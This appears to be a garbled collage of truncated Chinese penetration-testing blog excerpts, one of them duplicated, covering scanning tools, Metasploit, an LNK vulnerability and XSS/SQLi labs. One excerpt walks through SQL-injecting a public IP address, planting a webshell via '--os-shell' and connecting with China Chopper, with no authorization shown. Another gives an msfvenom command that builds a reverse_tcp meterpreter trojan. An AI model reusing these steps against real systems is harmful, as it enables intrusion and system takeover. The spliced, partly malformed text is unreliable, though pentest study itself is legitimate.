day-one1、拿到一个待检测的web站，渗透测试思路？答：（1）信息收集获取域名的whois信息，获取注册者的邮箱姓名电话等查服务器的旁站以及子域名站点，因为主站一般比较难，所以可以先看看旁站有没有通用cms或者其他漏洞查看服务器操作系统版本，web中间件，看看是否存在已知漏洞查看IP，进行IP地址的全面扫描，对响应端口进行漏洞探测（2）漏洞扫描：开始检测漏洞，例如XSS，SQL注入，命令执行，越权访问，暴力破解…（3）漏洞利用：利用扫描到的漏洞拿到webshell或者其他权限（4）提权：提权服务器（5）日志清理（6）总结报告及修复方案2、渗透测试中常见端口？答：1）数据库类（扫描弱口令）

首先环境配置VMware的网络配置图环境拓扑图开始渗透信息收集使用kali扫描一下靶机的IP地址靶机IP：192.168.0.114攻击机IP：192.168.0.109获取到了ip地址之后，我们扫描一下靶机开放的端口靶机开放了21,80,999,3389,5985,6588端口使用masscan扫描的时候，rate不要改那么大，不然可能会被拦截，导致扫描出来的结果不完全根据开放的端口使用nmap进行进一步的扫描好像有很多个httpd服务，我们从80开始试直接访问是行不通的，我们需要编辑hosts给他解析一个域名这个域名是题目给的www.moonlab.com我们修改一下hosts文件后再去访

渗透常用工具-Goby前言Goby下载Goby使用新建扫描任务自定义POC添加插件扫描设置资产测绘与高级设置Goby红队版前言许久没更新这个栏目了，今天就来介绍一下经常用到的工具：Goby初学安全的朋友可能对这个工具不太熟悉，这个主要是用作于扫描资产是否存在漏洞的工具，里面内置了丰富的POC（漏洞验证）包，在检测后并会出一份详细的报告给到使用者。Goby下载goby的官网链接：https://gobysec.net/sale根据自己的操作系统下载对应的版本，我这里是windows版本，所以下载的是第一个。下载后得到一个压缩包，解压后可以看到以下文件，打开Goby.exe文件Goby使用在左下角

攻击网站：http://43.138.2145这个网站进行渗透测试，工具：使用webshell管理工具中国菜刀操作步骤（1）首先扫描网站是否存在漏洞（2）扫描出网站的数据库名，为“510cms”（3）根据库名扫描出表名（3）选择我们需要的表，根据表找到列名（4）根据列名找到字段名，找到name，passwd的内容（6）由此找到，用户名和密码（7）登陆后台（8）使用—os-shell命令进行挂马（9）找到http://43.138.211.45:80/tmpujcyy.php（10）打开中国菜刀(11)输入http://43.138.211.45:80/tmpujcyy.php,并上传文件hac

渗透测试工程师简介渗透测试(penetrationtest)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。简言之就是从攻击者的角度对应用程序或网络进行安全评估和测试、检查和审核其存在的问题和安全性。渗透测试工程师职业前景从世界范围看，网络安全威胁和风险日益突出。数字时代，更多的连接意味着更多的漏洞，所有网络攻击的核心都是利用漏洞并随着技术的发展产生新的难题。网络空间

1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

 说明：本章内容，仅供学习，不要用于非法用途（做个好白帽）（一）震网三代漏洞“震网三代”官方漏洞编号是CVE-2017-8464，2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危传播的载体一般是LNK，LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell，哪怕是被隔离的内网，也可以在不上网的情况下被攻击后来发现该漏洞曾被攻击者用于攻击中国地震局的自动地震台网

文章目录Metasploit渗透测试框架基于TCP协议收集主机信息开放端口扫描db_nmap查询网段内在线存活的主机半连接的方式进行半连接扫描使用auxiliary/sniffer下的psunffle模块进行密码嗅探基于SNMP协议收集主机信息基于SSH协议收集主机信息实战-制作Linux恶意病毒获取公司服务权限实战-利用deb包-0day-java环境进行渗透Metasploit渗透测试框架一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6&spm_id_from=pageDriver&vd_source=5294f3174c

文章目录前言一、Web_For_Pentester1.实验环境2.XSS跨站脚本2.1Example12.2Example22.3Example32.4Example42.5Example52.1Example62.1Example72.1Example82.1Example93.SQL注入3.1Example13.2Example23.3Example33.4Example4